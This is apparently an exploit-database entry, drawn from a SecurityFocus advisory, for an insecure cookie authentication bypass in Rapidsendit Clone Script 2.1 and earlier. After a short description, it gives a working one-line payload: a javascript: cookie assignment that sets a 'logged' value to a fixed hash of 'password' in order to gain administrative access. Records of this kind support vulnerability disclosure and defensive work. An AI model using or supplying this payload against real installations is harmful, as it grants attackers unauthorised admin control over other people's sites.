[] NeoSense

Rapidsendit Clone Script - 'admin.php' Insecure Cookie Authentication Bypass

Author: NoGe
type: webapps
platform: php
port: 
date_added: 2009-07-08 
date_updated: 2014-09-28 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/43702/info

Rapidsendit Clone Script is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.

Attackers can exploit this vulnerability to gain administrative access to the affected application; this may aid in further attacks.

Rapidsendit Clone Script 2.1 and prior are vulnerable.

javascript:document.cookie="logged=696d29e0940a4957748fe3fc9efd22a3; path=/";
696d29e0940a4957748fe3fc9efd22a3 = password